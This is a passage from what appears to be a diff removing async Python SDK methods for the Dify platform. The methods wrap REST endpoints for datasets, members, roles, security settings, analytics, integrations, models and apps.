manage_built_in_metadata(self, action: str, metadata_data: Dict[str, Any] = None): - """Manage built-in metadata with specified action.""" - data = metadata_data or {} - url = f"/datasets/{self._get_dataset_id()}/metadata/built-in/{action}" - return await self._send_request("POST", url, json=data) - - async def update_documents_metadata(self, operation_data: List[Dict[str, Any]]): - """Update metadata for multiple documents.""" - url = f"/datasets/{self._get_dataset_id()}/documents/metadata" - data = {"operation_data": operation_data} - return await self._send_request("POST", url, json=data) - - # Dataset Tags APIs - async def list_dataset_tags(self): - """List all dataset tags.""" - return await self._send_request("GET", "/datasets/tags") - - async def bind_dataset_tags(self, tag_ids: List[str]): - """Bind tags to dataset.""" - data = {"tag_ids": tag_ids, "target_id": self._get_dataset_id()} - return await self._send_request("POST", "/datasets/tags/binding", json=data) - - async def unbind_dataset_tag(self, tag_id: str): - """Unbind a single tag from dataset.""" - data = {"tag_id": tag_id, "target_id": self._get_dataset_id()} - return await self._send_request("POST", "/datasets/tags/unbinding", json=data) - - async def get_dataset_tags(self): - """Get tags for current dataset.""" - url = f"/datasets/{self._get_dataset_id()}/tags" - return await self._send_request("GET", url) - - # RAG Pipeline APIs - async def get_datasource_plugins(self, is_published: bool = True): - """Get datasource plugins for RAG pipeline.""" - params = {"is_published": is_published} - url = f"/datasets/{self._get_dataset_id()}/pipeline/datasource-plugins" - return await self._send_request("GET", url, params=params) - - async def run_datasource_node( - self, - node_id: str, - inputs: Dict[str, Any], - datasource_type: str, - is_published: bool = True, - credential_id: str = None, - ): - """Run a datasource node in RAG pipeline.""" - data = { - "inputs": inputs, - "datasource_type": datasource_type, - "is_published": is_published, - } - if credential_id: - data["credential_id"] = credential_id - url = f"/datasets/{self._get_dataset_id()}/pipeline/datasource/nodes/{node_id}/run" - return await self._send_request("POST", url, json=data, stream=True) - - async def run_rag_pipeline( - self, - inputs: Dict[str, Any], - datasource_type: str, - datasource_info_list: List[Dict[str, Any]], - start_node_id: str, - is_published: bool = True, - response_mode: Literal["streaming", "blocking"] = "blocking", - ): - """Run RAG pipeline.""" - data = { - "inputs": inputs, - "datasource_type": datasource_type, - "datasource_info_list": datasource_info_list, - "start_node_id": start_node_id, - "is_published": is_published, - "response_mode": response_mode, - } - url = f"/datasets/{self._get_dataset_id()}/pipeline/run" - return await self._send_request("POST", url, json=data, stream=response_mode == "streaming") - - async def upload_pipeline_file(self, file_path: str): - """Upload file for RAG pipeline.""" - async with aiofiles.open(file_path, "rb") as f: - files = {"file": (os.path.basename(file_path), f)} - return await self._send_request_with_files("POST", "/datasets/pipeline/file-upload", {}, files) - - # Dataset Management APIs - async def get_dataset(self, dataset_id: str | None = None): - """Get detailed information about a specific dataset.""" - ds_id = dataset_id or self._get_dataset_id() - url = f"/datasets/{ds_id}" - return await self._send_request("GET", url) - - async def update_dataset( - self, - dataset_id: str | None = None, - name: str | None = None, - description: str | None = None, - indexing_technique: str | None = None, - embedding_model: str | None = None, - embedding_model_provider: str | None = None, - retrieval_model: Dict[str, Any] | None = None, - **kwargs, - ): - """Update dataset configuration. - - Args: - dataset_id: Dataset ID (optional, uses current dataset_id if not provided) - name: New dataset name - description: New dataset description - indexing_technique: Indexing technique ('high_quality' or 'economy') - embedding_model: Embedding model name - embedding_model_provider: Embedding model provider - retrieval_model: Retrieval model configuration dict - **kwargs: Additional parameters to pass to the API - - Returns: - Response from the API with updated dataset information - """ - ds_id = dataset_id or self._get_dataset_id() - url = f"/datasets/{ds_id}" - - payload = { - "name": name, - "description": description, - "indexing_technique": indexing_technique, - "embedding_model": embedding_model, - "embedding_model_provider": embedding_model_provider, - "retrieval_model": retrieval_model, - } - - data = {k: v for k, v in payload.items() if v is not None} - data.update(kwargs) - - return await self._send_request("PATCH", url, json=data) - - async def batch_update_document_status( - self, - action: Literal["enable", "disable", "archive", "un_archive"], - document_ids: List[str], - dataset_id: str | None = None, - ): - """Batch update document status.""" - ds_id = dataset_id or self._get_dataset_id() - url = f"/datasets/{ds_id}/documents/status/{action}" - data = {"document_ids": document_ids} - return await self._send_request("PATCH", url, json=data) - - # Enhanced Dataset APIs - - async def create_dataset_from_template(self, template_name: str, name: str, description: str | None = None): - """Create a dataset from a predefined template. - - Args: - template_name: Name of the template to use - name: Name for the new dataset - description: Description for the dataset (optional) - - Returns: - Created dataset information - """ - data = { - "template_name": template_name, - "name": name, - "description": description, - } - return await self._send_request("POST", "/datasets/from-template", json=data) - - async def duplicate_dataset(self, dataset_id: str, name: str): - """Duplicate an existing dataset. - - Args: - dataset_id: ID of dataset to duplicate - name: Name for duplicated dataset - - Returns: - New dataset information - """ - data = {"name": name} - url = f"/datasets/{dataset_id}/duplicate" - return await self._send_request("POST", url, json=data) - - async def update_conversation_variable_with_response( - self, conversation_id: str, variable_id: str, user: str, value: Any - ): - """Update a conversation variable with full response handling.""" - data = {"value": value, "user": user} - url = f"/conversations/{conversation_id}/variables/{variable_id}" - return await self._send_request("PUT", url, json=data) - - async def list_conversation_variables_with_pagination( - self, conversation_id: str, user: str, page: int = 1, limit: int = 20 - ): - """List conversation variables with pagination.""" - params = {"page": page, "limit": limit, "user": user} - url = f"/conversations/{conversation_id}/variables" - return await self._send_request("GET", url, params=params) - - -class AsyncEnterpriseClient(AsyncDifyClient): - """Async Enterprise and Account Management APIs for Dify platform administration.""" - - async def get_account_info(self): - """Get current account information.""" - return await self._send_request("GET", "/account") - - async def update_account_info(self, account_data: Dict[str, Any]): - """Update account information.""" - return await self._send_request("PUT", "/account", json=account_data) - - # Member Management APIs - async def list_members(self, page: int = 1, limit: int = 20, keyword: str | None = None): - """List workspace members with pagination.""" - params = {"page": page, "limit": limit} - if keyword: - params["keyword"] = keyword - return await self._send_request("GET", "/members", params=params) - - async def invite_member(self, email: str, role: str, name: str | None = None): - """Invite a new member to the workspace.""" - data = {"email": email, "role": role} - if name: - data["name"] = name - return await self._send_request("POST", "/members/invite", json=data) - - async def get_member(self, member_id: str): - """Get detailed information about a specific member.""" - url = f"/members/{member_id}" - return await self._send_request("GET", url) - - async def update_member(self, member_id: str, member_data: Dict[str, Any]): - """Update member information.""" - url = f"/members/{member_id}" - return await self._send_request("PUT", url, json=member_data) - - async def remove_member(self, member_id: str): - """Remove a member from the workspace.""" - url = f"/members/{member_id}" - return await self._send_request("DELETE", url) - - async def deactivate_member(self, member_id: str): - """Deactivate a member account.""" - url = f"/members/{member_id}/deactivate" - return await self._send_request("POST", url) - - async def reactivate_member(self, member_id: str): - """Reactivate a deactivated member account.""" - url = f"/members/{member_id}/reactivate" - return await self._send_request("POST", url) - - # Role Management APIs - async def list_roles(self): - """List all available roles in the workspace.""" - return await self._send_request("GET", "/roles") - - async def create_role(self, name: str, description: str, permissions: List[str]): - """Create a new role with specified permissions.""" - data = {"name": name, "description": description, "permissions": permissions} - return await self._send_request("POST", "/roles", json=data) - - async def get_role(self, role_id: str): - """Get detailed information about a specific role.""" - url = f"/roles/{role_id}" - return await self._send_request("GET", url) - - async def update_role(self, role_id: str, role_data: Dict[str, Any]): - """Update role information.""" - url = f"/roles/{role_id}" - return await self._send_request("PUT", url, json=role_data) - - async def delete_role(self, role_id: str): - """Delete a role.""" - url = f"/roles/{role_id}" - return await self._send_request("DELETE", url) - - # Permission Management APIs - async def list_permissions(self): - """List all available permissions.""" - return await self._send_request("GET", "/permissions") - - async def get_role_permissions(self, role_id: str): - """Get permissions for a specific role.""" - url = f"/roles/{role_id}/permissions" - return await self._send_request("GET", url) - - async def update_role_permissions(self, role_id: str, permissions: List[str]): - """Update permissions for a role.""" - url = f"/roles/{role_id}/permissions" - data = {"permissions": permissions} - return await self._send_request("PUT", url, json=data) - - # Workspace Settings APIs - async def get_workspace_settings(self): - """Get workspace settings and configuration.""" - return await self._send_request("GET", "/workspace/settings") - - async def update_workspace_settings(self, settings_data: Dict[str, Any]): - """Update workspace settings.""" - return await self._send_request("PUT", "/workspace/settings", json=settings_data) - - async def get_workspace_statistics(self): - """Get workspace usage statistics.""" - return await self._send_request("GET", "/workspace/statistics") - - # Billing and Subscription APIs - async def get_billing_info(self): - """Get current billing information.""" - return await self._send_request("GET", "/billing") - - async def get_subscription_info(self): - """Get current subscription information.""" - return await self._send_request("GET", "/subscription") - - async def update_subscription(self, subscription_data: Dict[str, Any]): - """Update subscription settings.""" - return await self._send_request("PUT", "/subscription", json=subscription_data) - - async def get_billing_history(self, page: int = 1, limit: int = 20): - """Get billing history with pagination.""" - params = {"page": page, "limit": limit} - return await self._send_request("GET", "/billing/history", params=params) - - async def get_usage_metrics(self, start_date: str, end_date: str, metric_type: str | None = None): - """Get usage metrics for a date range.""" - params = {"start_date": start_date, "end_date": end_date} - if metric_type: - params["metric_type"] = metric_type - return await self._send_request("GET", "/usage/metrics", params=params) - - # Audit Logs APIs - async def get_audit_logs( - self, - page: int = 1, - limit: int = 20, - action: str | None = None, - user_id: str | None = None, - start_date: str | None = None, - end_date: str | None = None, - ): - """Get audit logs with filtering options.""" - params = {"page": page, "limit": limit} - if action: - params["action"] = action - if user_id: - params["user_id"] = user_id - if start_date: - params["start_date"] = start_date - if end_date: - params["end_date"] = end_date - return await self._send_request("GET", "/audit/logs", params=params) - - async def export_audit_logs(self, format: str = "csv", filters: Dict[str, Any] | None = None): - """Export audit logs in specified format.""" - params = {"format": format} - if filters: - params.update(filters) - return await self._send_request("GET", "/audit/logs/export", params=params) - - -class AsyncSecurityClient(AsyncDifyClient): - """Async Security and Access Control APIs for Dify platform security management.""" - - # API Key Management APIs - async def list_api_keys(self, page: int = 1, limit: int = 20, status: str | None = None): - """List all API keys with pagination and filtering.""" - params = {"page": page, "limit": limit} - if status: - params["status"] = status - return await self._send_request("GET", "/security/api-keys", params=params) - - async def create_api_key( - self, - name: str, - permissions: List[str], - expires_at: str | None = None, - description: str | None = None, - ): - """Create a new API key with specified permissions.""" - data = {"name": name, "permissions": permissions} - if expires_at: - data["expires_at"] = expires_at - if description: - data["description"] = description - return await self._send_request("POST", "/security/api-keys", json=data) - - async def get_api_key(self, key_id: str): - """Get detailed information about an API key.""" - url = f"/security/api-keys/{key_id}" - return await self._send_request("GET", url) - - async def update_api_key(self, key_id: str, key_data: Dict[str, Any]): - """Update API key information.""" - url = f"/security/api-keys/{key_id}" - return await self._send_request("PUT", url, json=key_data) - - async def revoke_api_key(self, key_id: str): - """Revoke an API key.""" - url = f"/security/api-keys/{key_id}/revoke" - return await self._send_request("POST", url) - - async def rotate_api_key(self, key_id: str): - """Rotate an API key (generate new key).""" - url = f"/security/api-keys/{key_id}/rotate" - return await self._send_request("POST", url) - - # Rate Limiting APIs - async def get_rate_limits(self): - """Get current rate limiting configuration.""" - return await self._send_request("GET", "/security/rate-limits") - - async def update_rate_limits(self, limits_config: Dict[str, Any]): - """Update rate limiting configuration.""" - return await self._send_request("PUT", "/security/rate-limits", json=limits_config) - - async def get_rate_limit_usage(self, timeframe: str = "1h"): - """Get rate limit usage statistics.""" - params = {"timeframe": timeframe} - return await self._send_request("GET", "/security/rate-limits/usage", params=params) - - # Access Control Lists APIs - async def list_access_policies(self, page: int = 1, limit: int = 20): - """List access control policies.""" - params = {"page": page, "limit": limit} - return await self._send_request("GET", "/security/access-policies", params=params) - - async def create_access_policy(self, policy_data: Dict[str, Any]): - """Create a new access control policy.""" - return await self._send_request("POST", "/security/access-policies", json=policy_data) - - async def get_access_policy(self, policy_id: str): - """Get detailed information about an access policy.""" - url = f"/security/access-policies/{policy_id}" - return await self._send_request("GET", url) - - async def update_access_policy(self, policy_id: str, policy_data: Dict[str, Any]): - """Update an access control policy.""" - url = f"/security/access-policies/{policy_id}" - return await self._send_request("PUT", url, json=policy_data) - - async def delete_access_policy(self, policy_id: str): - """Delete an access control policy.""" - url = f"/security/access-policies/{policy_id}" - return await self._send_request("DELETE", url) - - # Security Settings APIs - async def get_security_settings(self): - """Get security configuration settings.""" - return await self._send_request("GET", "/security/settings") - - async def update_security_settings(self, settings_data: Dict[str, Any]): - """Update security configuration settings.""" - return await self._send_request("PUT", "/security/settings", json=settings_data) - - async def get_security_audit_logs( - self, - page: int = 1, - limit: int = 20, - event_type: str | None = None, - start_date: str | None = None, - end_date: str | None = None, - ): - """Get security-specific audit logs.""" - params = {"page": page, "limit": limit} - if event_type: - params["event_type"] = event_type - if start_date: - params["start_date"] = start_date - if end_date: - params["end_date"] = end_date - return await self._send_request("GET", "/security/audit-logs", params=params) - - # IP Whitelist/Blacklist APIs - async def get_ip_whitelist(self): - """Get IP whitelist configuration.""" - return await self._send_request("GET", "/security/ip-whitelist") - - async def update_ip_whitelist(self, ip_list: List[str], description: str | None = None): - """Update IP whitelist configuration.""" - data = {"ip_list": ip_list} - if description: - data["description"] = description - return await self._send_request("PUT", "/security/ip-whitelist", json=data) - - async def get_ip_blacklist(self): - """Get IP blacklist configuration.""" - return await self._send_request("GET", "/security/ip-blacklist") - - async def update_ip_blacklist(self, ip_list: List[str], description: str | None = None): - """Update IP blacklist configuration.""" - data = {"ip_list": ip_list} - if description: - data["description"] = description - return await self._send_request("PUT", "/security/ip-blacklist", json=data) - - # Authentication Settings APIs - async def get_auth_settings(self): - """Get authentication configuration settings.""" - return await self._send_request("GET", "/security/auth-settings") - - async def update_auth_settings(self, auth_data: Dict[str, Any]): - """Update authentication configuration settings.""" - return await self._send_request("PUT", "/security/auth-settings", json=auth_data) - - async def test_auth_configuration(self, auth_config: Dict[str, Any]): - """Test authentication configuration.""" - return await self._send_request("POST", "/security/auth-settings/test", json=auth_config) - - -class AsyncAnalyticsClient(AsyncDifyClient): - """Async Analytics and Monitoring APIs for Dify platform insights and metrics.""" - - # Usage Analytics APIs - async def get_usage_analytics( - self, - start_date: str, - end_date: str, - granularity: str = "day", - metrics: List[str] | None = None, - ): - """Get usage analytics for specified date range.""" - params = { - "start_date": start_date, - "end_date": end_date, - "granularity": granularity, - } - if metrics: - params["metrics"] = ",".join(metrics) - return await self._send_request("GET", "/analytics/usage", params=params) - - async def get_app_usage_analytics(self, app_id: str, start_date: str, end_date: str, granularity: str = "day"): - """Get usage analytics for a specific app.""" - params = { - "start_date": start_date, - "end_date": end_date, - "granularity": granularity, - } - url = f"/analytics/apps/{app_id}/usage" - return await self._send_request("GET", url, params=params) - - async def get_user_analytics(self, start_date: str, end_date: str, user_segment: str | None = None): - """Get user analytics and behavior insights.""" - params = {"start_date": start_date, "end_date": end_date} - if user_segment: - params["user_segment"] = user_segment - return await self._send_request("GET", "/analytics/users", params=params) - - # Performance Metrics APIs - async def get_performance_metrics(self, start_date: str, end_date: str, metric_type: str | None = None): - """Get performance metrics for the platform.""" - params = {"start_date": start_date, "end_date": end_date} - if metric_type: - params["metric_type"] = metric_type - return await self._send_request("GET", "/analytics/performance", params=params) - - async def get_app_performance_metrics(self, app_id: str, start_date: str, end_date: str): - """Get performance metrics for a specific app.""" - params = {"start_date": start_date, "end_date": end_date} - url = f"/analytics/apps/{app_id}/performance" - return await self._send_request("GET", url, params=params) - - async def get_model_performance_metrics(self, model_provider: str, model_name: str, start_date: str, end_date: str): - """Get performance metrics for a specific model.""" - params = {"start_date": start_date, "end_date": end_date} - url = f"/analytics/models/{model_provider}/{model_name}/performance" - return await self._send_request("GET", url, params=params) - - # Cost Tracking APIs - async def get_cost_analytics(self, start_date: str, end_date: str, cost_type: str | None = None): - """Get cost analytics and breakdown.""" - params = {"start_date": start_date, "end_date": end_date} - if cost_type: - params["cost_type"] = cost_type - return await self._send_request("GET", "/analytics/costs", params=params) - - async def get_app_cost_analytics(self, app_id: str, start_date: str, end_date: str): - """Get cost analytics for a specific app.""" - params = {"start_date": start_date, "end_date": end_date} - url = f"/analytics/apps/{app_id}/costs" - return await self._send_request("GET", url, params=params) - - async def get_cost_forecast(self, forecast_period: str = "30d"): - """Get cost forecast for specified period.""" - params = {"forecast_period": forecast_period} - return await self._send_request("GET", "/analytics/costs/forecast", params=params) - - # Real-time Monitoring APIs - async def get_real_time_metrics(self): - """Get real-time platform metrics.""" - return await self._send_request("GET", "/analytics/realtime") - - async def get_app_real_time_metrics(self, app_id: str): - """Get real-time metrics for a specific app.""" - url = f"/analytics/apps/{app_id}/realtime" - return await self._send_request("GET", url) - - async def get_system_health(self): - """Get overall system health status.""" - return await self._send_request("GET", "/analytics/health") - - # Custom Reports APIs - async def create_custom_report(self, report_config: Dict[str, Any]): - """Create a custom analytics report.""" - return await self._send_request("POST", "/analytics/reports", json=report_config) - - async def list_custom_reports(self, page: int = 1, limit: int = 20): - """List custom analytics reports.""" - params = {"page": page, "limit": limit} - return await self._send_request("GET", "/analytics/reports", params=params) - - async def get_custom_report(self, report_id: str): - """Get a specific custom report.""" - url = f"/analytics/reports/{report_id}" - return await self._send_request("GET", url) - - async def update_custom_report(self, report_id: str, report_config: Dict[str, Any]): - """Update a custom analytics report.""" - url = f"/analytics/reports/{report_id}" - return await self._send_request("PUT", url, json=report_config) - - async def delete_custom_report(self, report_id: str): - """Delete a custom analytics report.""" - url = f"/analytics/reports/{report_id}" - return await self._send_request("DELETE", url) - - async def generate_report(self, report_id: str, format: str = "pdf"): - """Generate and download a custom report.""" - params = {"format": format} - url = f"/analytics/reports/{report_id}/generate" - return await self._send_request("GET", url, params=params) - - # Export APIs - async def export_analytics_data(self, data_type: str, start_date: str, end_date: str, format: str = "csv"): - """Export analytics data in specified format.""" - params = { - "data_type": data_type, - "start_date": start_date, - "end_date": end_date, - "format": format, - } - return await self._send_request("GET", "/analytics/export", params=params) - - -class AsyncIntegrationClient(AsyncDifyClient): - """Async Integration and Plugin APIs for Dify platform extensibility.""" - - # Webhook Management APIs - async def list_webhooks(self, page: int = 1, limit: int = 20, status: str | None = None): - """List webhooks with pagination and filtering.""" - params = {"page": page, "limit": limit} - if status: - params["status"] = status - return await self._send_request("GET", "/integrations/webhooks", params=params) - - async def create_webhook(self, webhook_data: Dict[str, Any]): - """Create a new webhook.""" - return await self._send_request("POST", "/integrations/webhooks", json=webhook_data) - - async def get_webhook(self, webhook_id: str): - """Get detailed information about a webhook.""" - url = f"/integrations/webhooks/{webhook_id}" - return await self._send_request("GET", url) - - async def update_webhook(self, webhook_id: str, webhook_data: Dict[str, Any]): - """Update webhook configuration.""" - url = f"/integrations/webhooks/{webhook_id}" - return await self._send_request("PUT", url, json=webhook_data) - - async def delete_webhook(self, webhook_id: str): - """Delete a webhook.""" - url = f"/integrations/webhooks/{webhook_id}" - return await self._send_request("DELETE", url) - - async def test_webhook(self, webhook_id: str): - """Test webhook delivery.""" - url = f"/integrations/webhooks/{webhook_id}/test" - return await self._send_request("POST", url) - - async def get_webhook_logs(self, webhook_id: str, page: int = 1, limit: int = 20): - """Get webhook delivery logs.""" - params = {"page": page, "limit": limit} - url = f"/integrations/webhooks/{webhook_id}/logs" - return await self._send_request("GET", url, params=params) - - # Plugin Management APIs - async def list_plugins(self, page: int = 1, limit: int = 20, category: str | None = None): - """List available plugins.""" - params = {"page": page, "limit": limit} - if category: - params["category"] = category - return await self._send_request("GET", "/integrations/plugins", params=params) - - async def install_plugin(self, plugin_id: str, config: Dict[str, Any] | None = None): - """Install a plugin.""" - data = {"plugin_id": plugin_id} - if config: - data["config"] = config - return await self._send_request("POST", "/integrations/plugins/install", json=data) - - async def get_installed_plugin(self, installation_id: str): - """Get information about an installed plugin.""" - url = f"/integrations/plugins/{installation_id}" - return await self._send_request("GET", url) - - async def update_plugin_config(self, installation_id: str, config: Dict[str, Any]): - """Update plugin configuration.""" - url = f"/integrations/plugins/{installation_id}/config" - return await self._send_request("PUT", url, json=config) - - async def uninstall_plugin(self, installation_id: str): - """Uninstall a plugin.""" - url = f"/integrations/plugins/{installation_id}" - return await self._send_request("DELETE", url) - - async def enable_plugin(self, installation_id: str): - """Enable a plugin.""" - url = f"/integrations/plugins/{installation_id}/enable" - return await self._send_request("POST", url) - - async def disable_plugin(self, installation_id: str): - """Disable a plugin.""" - url = f"/integrations/plugins/{installation_id}/disable" - return await self._send_request("POST", url) - - # Import/Export APIs - async def export_app_data(self, app_id: str, format: str = "json", include_data: bool = True): - """Export application data.""" - params = {"format": format, "include_data": include_data} - url = f"/integrations/export/apps/{app_id}" - return await self._send_request("GET", url, params=params) - - async def import_app_data(self, import_data: Dict[str, Any]): - """Import application data.""" - return await self._send_request("POST", "/integrations/import/apps", json=import_data) - - async def get_import_status(self, import_id: str): - """Get import operation status.""" - url = f"/integrations/import/{import_id}/status" - return await self._send_request("GET", url) - - async def export_workspace_data(self, format: str = "json", include_data: bool = True): - """Export workspace data.""" - params = {"format": format, "include_data": include_data} - return await self._send_request("GET", "/integrations/export/workspace", params=params) - - async def import_workspace_data(self, import_data: Dict[str, Any]): - """Import workspace data.""" - return await self._send_request("POST", "/integrations/import/workspace", json=import_data) - - # Backup and Restore APIs - async def create_backup(self, backup_config: Dict[str, Any] | None = None): - """Create a system backup.""" - data = backup_config or {} - return await self._send_request("POST", "/integrations/backup/create", json=data) - - async def list_backups(self, page: int = 1, limit: int = 20): - """List available backups.""" - params = {"page": page, "limit": limit} - return await self._send_request("GET", "/integrations/backup", params=params) - - async def get_backup(self, backup_id: str): - """Get backup information.""" - url = f"/integrations/backup/{backup_id}" - return await self._send_request("GET", url) - - async def restore_backup(self, backup_id: str, restore_config: Dict[str, Any] | None = None): - """Restore from backup.""" - data = restore_config or {} - url = f"/integrations/backup/{backup_id}/restore" - return await self._send_request("POST", url, json=data) - - async def delete_backup(self, backup_id: str): - """Delete a backup.""" - url = f"/integrations/backup/{backup_id}" - return await self._send_request("DELETE", url) - - -class AsyncAdvancedModelClient(AsyncDifyClient): - """Async Advanced Model Management APIs for fine-tuning and custom deployments.""" - - # Fine-tuning Job Management APIs - async def list_fine_tuning_jobs( - self, - page: int = 1, - limit: int = 20, - status: str | None = None, - model_provider: str | None = None, - ): - """List fine-tuning jobs with filtering.""" - params = {"page": page, "limit": limit} - if status: - params["status"] = status - if model_provider: - params["model_provider"] = model_provider - return await self._send_request("GET", "/models/fine-tuning/jobs", params=params) - - async def create_fine_tuning_job(self, job_config: Dict[str, Any]): - """Create a new fine-tuning job.""" - return await self._send_request("POST", "/models/fine-tuning/jobs", json=job_config) - - async def get_fine_tuning_job(self, job_id: str): - """Get fine-tuning job details.""" - url = f"/models/fine-tuning/jobs/{job_id}" - return await self._send_request("GET", url) - - async def update_fine_tuning_job(self, job_id: str, job_config: Dict[str, Any]): - """Update fine-tuning job configuration.""" - url = f"/models/fine-tuning/jobs/{job_id}" - return await self._send_request("PUT", url, json=job_config) - - async def cancel_fine_tuning_job(self, job_id: str): - """Cancel a fine-tuning job.""" - url = f"/models/fine-tuning/jobs/{job_id}/cancel" - return await self._send_request("POST", url) - - async def resume_fine_tuning_job(self, job_id: str): - """Resume a paused fine-tuning job.""" - url = f"/models/fine-tuning/jobs/{job_id}/resume" - return await self._send_request("POST", url) - - async def get_fine_tuning_job_metrics(self, job_id: str): - """Get fine-tuning job training metrics.""" - url = f"/models/fine-tuning/jobs/{job_id}/metrics" - return await self._send_request("GET", url) - - async def get_fine_tuning_job_logs(self, job_id: str, page: int = 1, limit: int = 50): - """Get fine-tuning job logs.""" - params = {"page": page, "limit": limit} - url = f"/models/fine-tuning/jobs/{job_id}/logs" - return await self._send_request("GET", url, params=params) - - # Custom Model Deployment APIs - async def list_custom_deployments(self, page: int = 1, limit: int = 20, status: str | None = None): - """List custom model deployments.""" - params = {"page": page, "limit": limit} - if status: - params["status"] = status - return await self._send_request("GET", "/models/custom/deployments", params=params) - - async def create_custom_deployment(self, deployment_config: Dict[str, Any]): - """Create a custom model deployment.""" - return await self._send_request("POST", "/models/custom/deployments", json=deployment_config) - - async def get_custom_deployment(self, deployment_id: str): - """Get custom deployment details.""" - url = f"/models/custom/deployments/{deployment_id}" - return await self._send_request("GET", url) - - async def update_custom_deployment(self, deployment_id: str, deployment_config: Dict[str, Any]): - """Update custom deployment configuration.""" - url = f"/models/custom/deployments/{deployment_id}" - return await self._send_request("PUT", url, json=deployment_config) - - async def delete_custom_deployment(self, deployment_id: str): - """Delete a custom deployment.""" - url = f"/models/custom/deployments/{deployment_id}" - return await self._send_request("DELETE", url) - - async def scale_custom_deployment(self, deployment_id: str, scale_config: Dict[str, Any]): - """Scale custom deployment resources.""" - url = f"/models/custom/deployments/{deployment_id}/scale" - return await self._send_request("POST", url, json=scale_config) - - async def restart_custom_deployment(self, deployment_id: str): - """Restart a custom deployment.""" - url = f"/models/custom/deployments/{deployment_id}/restart" - return await self._send_request("POST", url) - - # Model Performance Monitoring APIs - async def get_model_performance_history( - self, - model_provider: str, - model_name: str, - start_date: str, - end_date: str, - metrics: List[str] | None = None, - ): - """Get model performance history.""" - params = {"start_date": start_date, "end_date": end_date} - if metrics: - params["metrics"] = ",".join(metrics) - url = f"/models/{model_provider}/{model_name}/performance/history" - return await self._send_request("GET", url, params=params) - - async def get_model_health_metrics(self, model_provider: str, model_name: str): - """Get real-time model health metrics.""" - url = f"/models/{model_provider}/{model_name}/health" - return await self._send_request("GET", url) - - async def get_model_usage_stats( - self, - model_provider: str, - model_name: str, - start_date: str, - end_date: str, - granularity: str = "day", - ): - """Get model usage statistics.""" - params = { - "start_date": start_date, - "end_date": end_date, - "granularity": granularity, - } - url = f"/models/{model_provider}/{model_name}/usage" - return await self._send_request("GET", url, params=params) - - async def get_model_cost_analysis(self, model_provider: str, model_name: str, start_date: str, end_date: str): - """Get model cost analysis.""" - params = {"start_date": start_date, "end_date": end_date} - url = f"/models/{model_provider}/{model_name}/costs" - return await self._send_request("GET", url, params=params) - - # Model Versioning APIs - async def list_model_versions(self, model_provider: str, model_name: str, page: int = 1, limit: int = 20): - """List model versions.""" - params = {"page": page, "limit": limit} - url = f"/models/{model_provider}/{model_name}/versions" - return await self._send_request("GET", url, params=params) - - async def create_model_version(self, model_provider: str, model_name: str, version_config: Dict[str, Any]): - """Create a new model version.""" - url = f"/models/{model_provider}/{model_name}/versions" - return await self._send_request("POST", url, json=version_config) - - async def get_model_version(self, model_provider: str, model_name: str, version_id: str): - """Get model version details.""" - url = f"/models/{model_provider}/{model_name}/versions/{version_id}" - return await self._send_request("GET", url) - - async def promote_model_version(self, model_provider: str, model_name: str, version_id: str): - """Promote model version to production.""" - url = f"/models/{model_provider}/{model_name}/versions/{version_id}/promote" - return await self._send_request("POST", url) - - async def rollback_model_version(self, model_provider: str, model_name: str, version_id: str): - """Rollback to a specific model version.""" - url = f"/models/{model_provider}/{model_name}/versions/{version_id}/rollback" - return await self._send_request("POST", url) - - # Model Registry APIs - async def list_registry_models(self, page: int = 1, limit: int = 20, filter: str | None = None): - """List models in registry.""" - params = {"page": page, "limit": limit} - if filter: - params["filter"] = filter - return await self._send_request("GET", "/models/registry", params=params) - - async def register_model(self, model_config: Dict[str, Any]): - """Register a new model in the registry.""" - return await self._send_request("POST", "/models/registry", json=model_config) - - async def get_registry_model(self, model_id: str): - """Get registered model details.""" - url = f"/models/registry/{model_id}" - return await self._send_request("GET", url) - - async def update_registry_model(self, model_id: str, model_config: Dict[str, Any]): - """Update registered model information.""" - url = f"/models/registry/{model_id}" - return await self._send_request("PUT", url, json=model_config) - - async def unregister_model(self, model_id: str): - """Unregister a model from the registry.""" - url = f"/models/registry/{model_id}" - return await self._send_request("DELETE", url) - - -class AsyncAdvancedAppClient(AsyncDifyClient): - """Async Advanced App Configuration APIs for comprehensive app management.""" - - # App Creation and Management APIs - async def create_app(self, app_config: Dict[str, Any]): - """Create a new application.""" - return await self._send_request("POST", "/apps", json=app_config) - - async def list_apps( - self, - page: int = 1, - limit: int = 20, - app_type: str | None = None, - status: str | None = None, - ): - """List applications with filtering.""" - params = {"page": page, "limit": limit} - if app_type: - params["app_type"] = app_type - if status: - params["status"] = status - return await self._send_request("GET", "/apps", params=params) - - async def get_app(self, app_id: str): - """Get detailed application information.""" - url = f"/apps/{app_id}" - return await self._send_request("GET", url) - - async def update_app(self, app_id: str, app_config: Dict[str, Any]): - """Update application configuration.""" - url = f"/apps/{app_id}" - return await self._send_request("PUT", url, json=app_config) - - async def delete_app(self, app_id: str): - """Delete an application.""" - url = f"/apps/{app_id}" - return await self._send_request("DELETE", url) - - async def duplicate_app(self, app_id: str, duplicate_config: Dict[str, Any]): - """Duplicate an application.""" - url = f"/apps/{app_id}/duplicate" - return await self._send_request("POST", url, json=duplicate_config) - - async def archive_app(self, app_id: str): - """Archive an application.""" - url = f"/apps/{app_id}/archive" - return await self._send_request("POST", url) - - async def restore_app(self, app_id: str): - """Restore an archived application.""" - url = f"/apps/{app_id}/restore" - return await self._send_request("POST", url) - - # App Publishing and Versioning APIs - async def publish_app(self, app_id: str, publish_config: Dict[str, Any] | None = None): - """Publish an application.""" - data = publish_config or {} - url = f"/apps/{app_id}/publish" - return await self._send_request("POST", url, json=data) - - async def unpublish_app(self, app_id: str): - """Unpublish an application.""" - url = f"/apps/{app_id}/unpublish" - return await self._send_request("POST", url) - - async def list_app_versions(self, app_id: str, page: int = 1, limit: int = 20): - """List application versions.""" - params = {"page": page, "limit": limit} - url = f"/apps/{app_id}/versions" - return await self._send_request("GET", url, params=params) - - async def create_app_version(self, app_id: str, version_config: Dict[str, Any]): - """Create a new application version.""" - url = f"/apps/{app_id}/versions" - return await self._send_request("POST", url, json=version_config) - - async def get_app_version(self, app_id: str, version_id: str): - """Get application version details.""" - url = f"/apps/{app_id}/versions/{version_id}" - return await self._send_request("GET", url) - - async def rollback_app_version(self, app_id: str, version_id: str): - """Rollback application to a specific version.""" - url = f"/apps/{app_id}/versions/{version_id}/rollback" - return await self._send_request("POST", url) - - # App Template APIs - async def list_app_templates(self, page: int = 1, limit: int = 20, category: str | None = None): - """List available app templates.""" - params = {"page": page, "limit": limit} - if category: - params["category"] = category - return await self._send_request("GET", "/apps/templates", params=params) - - async def get_app_template(self, template_id: str): - """Get app template 